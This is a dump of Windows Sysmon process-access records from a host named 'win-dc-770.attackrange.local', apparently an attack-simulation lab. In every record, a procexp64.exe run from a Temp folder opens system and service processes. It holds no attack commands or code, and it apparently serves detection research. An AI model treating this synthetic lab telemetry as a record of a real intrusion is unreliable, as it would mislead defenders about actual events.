15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 